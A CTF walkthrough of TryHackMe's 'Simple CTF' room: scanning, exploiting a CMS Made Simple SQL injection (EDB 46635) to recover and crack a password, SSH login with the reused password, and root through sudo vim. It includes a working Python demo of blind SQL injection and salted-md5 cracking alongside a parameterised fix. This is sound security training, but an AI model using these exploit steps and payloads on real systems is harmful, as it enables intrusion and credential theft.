The Simple CTF — TryHackMe Writeup

Kadhirravan R
Developer Community SASTRA
4 min read · Aug 3, 2021

Hello guys! Today we will be looking at ‘Simple CTF’, a beginner-level room on TryHackMe. TryHackMe has always been the best platform for playing CTF. Simple CTF touches a lot of common weaknesses in one box: a web CMS with a known SQL injection, a password reused for SSH, and a sudo misconfiguration. So without wasting time, let’s begin :)

After connecting to the box, we can enumerate the target with nmap. The SYN scan (-sS) needs raw-socket privileges, so run it with sudo; -A adds version detection, default scripts and OS detection.

sudo nmap -A -sS <IP_ADDRESS>
nmap scan results

We can see three open ports among the top 1000 ports that nmap scans by default: an FTP server on port 21, a web server on port 80 and SSH on the non-standard port 2222. (Remember that port number; it matters for the SSH step later.)

The web server on port 80 only serves the default Apache2 page.

Apache2 Default Page

Before searching for exploits, we can brute-force common web directories with gobuster (the dir subcommand is required in gobuster 3.x; 2.x takes the same flags without it):

gobuster dir -u http://<IP_ADDRESS> -w /usr/share/wordlists/dirb/common.txt
gobuster results

We visit the “robots.txt” file first, but it does not point to anything useful.

Now, we open the “/simple” page.

CMS Made Simple Homepage

The page reveals that the web server has CMS Made Simple v2.2.8 installed; the exact version is what we need for the exploit search.

CMS Made Simple version 2.2.8

On the same page, we can find the link to the admin login form.

CMS Made Simple Admin Panel

With the information we gathered, we can move to the exciting part: exploitation!

Using searchsploit, we can look for an exploit matching this version:

searchsploit "CMS Made Simple"

Searchsploit results

From the results above, ‘CMS Made Simple < 2.2.10 - SQL Injection’ (EDB-ID 46635, CVE-2019-9053) covers our 2.2.8 install. A quick Google search confirms this.

Now, we get the exploit’s path on disk with

searchsploit -p 46635
More details on the exploit

But, when I tried to execute the program, I got an error that termcolor wasn’t present. This can be fixed by installing the missing termcolor module for Python 2 with pip.

We can run the exploit with the --crack option, which tries to crack the recovered password hash against the given wordlist (note the flag is two hyphens, --crack):

python2 /usr/share/exploitdb/exploits/php/webapps/46635.py -u http://<IP_ADDRESS>/simple/ --crack -w /usr/share/wordlists/passwords/rockyou.txt
Exploitation Success!
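To make clear what the exploit is actually doing, here is an added worked example (my own code, not the page’s and not 46635.py) that reproduces the two steps the script automates: a blind SQL injection that leaks a password hash and its salt one character at a time, and an offline wordlist crack of that hash. The database, table names, salt, password and wordlist are all constructed stand-ins living in an in-memory SQLite database; the md5(salt + password) scheme is what the --crack step assumes. The hardened lookup beside the vulnerable one shows the fix: validate and bind the IDs instead of concatenating them.

```python
import hashlib
import sqlite3
import string

# Constructed sample data for this demo (not values from the box).
SALT = "k3x9p2"
PASSWORD = "secret123"
WORDLIST = ["password", "letmein", "admin", "secret123", "qwerty"]
# Secrets we extract are hex hashes and alphanumeric salts, so this alphabet suffices.
ALPHABET = string.ascii_lowercase + string.digits


def build_db():
    """In-memory stand-in for the CMS database (constructed schema, not the real one)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cms_news (news_id INTEGER)")
    con.execute("CREATE TABLE cms_users (user_id INTEGER, username TEXT, password TEXT)")
    con.execute("CREATE TABLE cms_siteprefs (sitepref_name TEXT, sitepref_value TEXT)")
    con.execute("INSERT INTO cms_news VALUES (1)")
    digest = hashlib.md5((SALT + PASSWORD).encode()).hexdigest()  # md5(salt + password)
    con.execute("INSERT INTO cms_users VALUES (1, 'mitch', ?)", (digest,))
    con.execute("INSERT INTO cms_siteprefs VALUES ('sitemask', ?)", (SALT,))
    return con


def vulnerable_news_count(con, idlist):
    """The bug pattern: a user-supplied ID list concatenated straight into SQL."""
    sql = "SELECT COUNT(*) FROM cms_news WHERE news_id IN (" + idlist + ")"
    return con.execute(sql).fetchone()[0]


def safe_news_count(con, idlist):
    """Hardened version: every ID must parse as an integer and is bound as a parameter."""
    ids = [int(x) for x in idlist.split(",")]  # raises ValueError on any injection attempt
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT COUNT(*) FROM cms_news WHERE news_id IN (" + placeholders + ")"
    return con.execute(sql, ids).fetchone()[0]


def blind_extract(con, subquery, max_len=64):
    """Boolean-blind extraction of a secret, one character per position.

    The payload closes the IN (...) list and appends an AND condition on one
    character of the secret; the row count (1 or 0) answers each guess.
    """
    result = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = "substr((%s),%d,1)='%s'" % (subquery, pos, ch)
            payload = "1) AND (" + cond
            if vulnerable_news_count(con, payload) == 1:
                result += ch
                break
        else:
            break  # no character matched: we ran past the end of the secret
    return result


def crack(hash_hex, salt, wordlist):
    """Offline crack, as the --crack option does: recompute md5(salt + word) for each candidate."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == hash_hex:
            return word
    return None


def run_demo():
    """Full chain: leak the hash and the salt via the injection, then crack the hash."""
    con = build_db()
    hash_hex = blind_extract(con, "SELECT password FROM cms_users WHERE user_id=1")
    salt = blind_extract(
        con, "SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name='sitemask'"
    )
    return hash_hex, salt, crack(hash_hex, salt, WORDLIST)


if __name__ == "__main__":
    h, s, pw = run_demo()
    print("hash=%s salt=%s password=%s" % (h, s, pw))
```

The real exploit has to work over HTTP against a MySQL backend, so it uses a time-based condition (a delay instead of a row count) and a different payload shape, but the logic is the same: one yes/no question per character, then a cheap offline crack, which is why a weak reused password ends the game.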

Logging in with the recovered credentials, we can successfully authenticate to the admin panel!

CMS Admin Panel authenticated

I couldn’t find anything interesting here, so I tried the SSH service instead. SSH listens on port 2222, not the default 22, so the port must be given explicitly:

ssh -p 2222 mitch@<IP_ADDRESS>

Using the same credentials (the CMS password is reused for the system account), I can successfully log in!

SSH successfully authenticated

In the home directory, we can find the user flag!

User Flag

To find other users, I listed the home directories:

ls /home
Users in the machine

There is a second user called sunbath, but I couldn’t access that directory. To escalate our privileges, I checked which commands mitch is allowed to run through sudo:

sudo -l

The output shows that we can execute vim as root.

To find ways of turning a sudo-able binary into a root shell, we can use this handy dandy website, GTFOBins:

https://gtfobins.github.io/gtfobins/vim/

We can use this command for vim (it spawns a shell from inside vim, and since vim runs as root, so does the shell):

sudo vim -c ':!/bin/sh'

And, voila! We have root access.

Mission Accomplished: Root access

Now, to find the root flag, we can read it from the /root directory.

Root flag located

Thanks for the read! :)
